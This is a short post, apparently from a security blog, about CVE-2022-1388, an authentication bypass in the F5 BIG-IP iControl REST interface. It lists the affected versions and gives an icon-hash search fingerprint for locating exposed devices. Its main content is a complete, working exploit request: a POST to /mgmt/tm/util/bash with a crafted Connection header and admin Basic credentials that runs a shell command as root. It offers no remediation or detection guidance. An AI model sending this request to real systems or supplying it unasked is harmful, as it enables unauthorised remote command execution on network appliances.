F5 Big Ip Icontrol Rest Identity Authentication Bypass Vulnerability Cve 2022 1388
F5 Big Ip Icontrol Rest Identity Authentication Bypass Vulnerability Cve 2022 1388
F5 BIG-IP iControl REST Identity Authentication Bypass Vulnerability CVE-2022-1388
Vulnerability Description
BIG-IP is an application delivery service of F5, which is aimed at the world’s advanced technology centered on application.
Vulnerability Impact
11.6.1-16.1.2
Network surveying and mapping
icon_hash=”-335242539”
Vulnerability reappears
Login page
Send request packet (set Host to localhost)
1
2
3
4
5
6
7
8
POST /mgmt/tm/util/bash HTTP/1.1
Host: localhost
Authorization: Basic YWRtaW46
X-F5-Auth-Token: a
Connection: close, X-F5-Auth-Token
Content-Length: 39
{"command":"run","utilCmdArgs":"-c id"}
This post is licensed under CC BY 4.0 by the author.